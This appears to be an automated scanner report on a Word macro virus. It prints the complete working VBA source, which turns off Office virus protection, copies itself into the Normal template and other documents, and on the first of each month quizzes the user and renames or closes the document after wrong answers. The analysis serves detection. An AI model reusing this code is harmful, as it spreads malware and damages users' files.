MALICIOUS
148
Risk Score
Heuristics 4
-
ClamAV: Doc.Trojan.Bptk-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Bptk-2
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3339 bytes |
SHA-256: 6b8fdff9a927f5d2a4cac4b1926f0740883368bb0dc226d61943bebcaa5c7ba7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim DI As Boolean, TI As Boolean, d As Object, t As Object, Src As String, r As String
Private Sub Document_Close()
On Error Resume Next
Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
Options.VirusProtection = False
If DI And Not (TI) Then
Src = d.CodeModule.Lines(1, d.CodeModule.CountOfLines)
t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
t.CodeModule.AddFromString Src
NormalTemplate.Save
ElseIf TI And Not (DI) Then
If Day(Now()) = 1 Then
Do
r = UCase(InputBox("长安之星车长多少米?" & Chr(13) & Chr(13) _
& "A.3米4 B.3米5 C.3米55 D.3米7" & Chr(13) & Chr(13) _
& "要好好思考哟!", "紧急提问"))
Loop Until r <> ""
If r = "B" Then
MsgBox "好棒哟!"
GoTo 10
Else
MsgBox "唉!再给你一次机会."
Do
r = UCase(InputBox("长安之星FBA是什么型?" & Chr(13) & Chr(13) _
& "A.标准型 B.普通型 C.豪华型" & Chr(13) & Chr(13) _
& "想好了再回答!", "紧急提问"))
Loop Until r <> ""
If r = "C" Then
MsgBox "谢谢你的支持!"
GoTo 10
Else
MsgBox "笨蛋!给你最后一次机会."
Do
r = UCase(InputBox("安全气囊是干什么用的?" & Chr(13) & Chr(13) _
& "A.防止撞车 B.防止侧滑 C.撞车时保护驾驶员" & Chr(13) & Chr(13) _
& "这是最后一次机会哟!", "紧急提问"))
Loop Until r <> ""
If r = "C" Then
MsgBox "总算答对了!"
GoTo 10
Else
MsgBox "看来你还需要对长安之星多加了解..."
ActiveDocument.SaveAs "c:\lzc.vxd"
ActiveDocument.Close
Exit Sub
End If
End If
End If
End If
10:
Src = t.CodeModule.Lines(1, t.CodeModule.CountOfLines)
d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
d.CodeModule.AddFromString Src
ActiveDocument.Save
End If
End Sub
Private Sub Document_Open()
On Error Resume Next
Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
Options.VirusProtection = False
If DI And Not (TI) Then
t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
ElseIf TI And Not (DI) Then
d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.